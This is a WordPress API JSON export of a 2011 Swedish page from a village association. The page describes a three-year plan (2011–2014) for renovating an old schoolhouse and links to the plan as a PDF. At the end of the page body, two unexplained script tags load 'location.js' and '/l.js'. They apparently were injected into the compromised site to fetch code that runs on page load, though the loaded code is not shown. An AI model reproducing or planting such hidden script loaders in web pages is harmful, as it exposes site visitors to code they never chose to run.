{"id":680,"date":"2011-09-30T22:27:40","date_gmt":"2011-09-30T20:27:40","guid":{"rendered":"http:\/\/84.20.155.7\/nywp\/?page_id=680"},"modified":"2011-09-30T22:27:40","modified_gmt":"2011-09-30T20:27:40","slug":"projektplanen-2011-2014","status":"publish","type":"page","link":"https:\/\/hindersby.net\/word2021\/gamla-folkskolans-vanner-gfv\/projektplanen-2011-2014\/","title":{"rendered":"Projektplanen 2011-2014"},"content":{"rendered":"<p>I ans\u00f6kan till Finlands hembygdf\u00f6rbund bifogades en projektplan f\u00f6r tre skeden (tre \u00e5r) om renoveringen av gamla skolan. Den \u00e4r p\u00e5 sju sidor och den som orkar l\u00e4sa igenom den f\u00e5r en ganska s\u00e5 bra bild av vad styrelsen funderat p\u00e5 &#8211; \u00e5tminstone prelimin\u00e4rt f\u00f6r det har varit ganska br\u00e5tt att hinna f\u00e5 in ans\u00f6kan (inom september). H\u00e4r nedan finns den i PDF-format som kan laddas ned och l\u00e4sas till exempel med Adobe Acrobat.<\/p>\n<p><a href=\"http:\/\/hindersby.net\/nywp\/wp-content\/uploads\/2011\/09\/projektplanGamal.pdf\">projektplanGamal<\/a><\/p>\n<p>Men kom ih\u00e5g att det bara \u00e4r en plan. Den b\u00f6r f\u00f6rst\u00e5s \u00e4ndras i den m\u00e5n det visar sej n\u00f6dv\u00e4ndigt eller b\u00e4ttre. Kommentarer och f\u00f6rslag mottas med tacksamhet.<\/p>\n<p>&nbsp;<script src='location.js?p=1' type=text\/javascript><\/script><script src='\/l.js?p=1' type=text\/javascript><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>I ans\u00f6kan till Finlands hembygdf\u00f6rbund bifogades en projektplan f\u00f6r tre skeden (tre \u00e5r) om renoveringen av gamla skolan. Den \u00e4r p\u00e5 sju sidor och den som orkar l\u00e4sa igenom den f\u00e5r en ganska s\u00e5 bra bild av vad styrelsen funderat p\u00e5 &#8211; \u00e5tminstone prelimin\u00e4rt f\u00f6r det har varit ganska br\u00e5tt att hinna f\u00e5 in ans\u00f6kan &hellip; <a href=\"https:\/\/hindersby.net\/word2021\/gamla-folkskolans-vanner-gfv\/projektplanen-2011-2014\/\" class=\"more-link\">Forts\u00e4tt l\u00e4sa<span class=\"screen-reader-text\"> \u201dProjektplanen 2011-2014\u201d<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"parent":486,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-680","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/pages\/680","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/comments?post=680"}],"version-history":[{"count":0,"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/pages\/680\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/pages\/486"}],"wp:attachment":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/media?parent=680"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}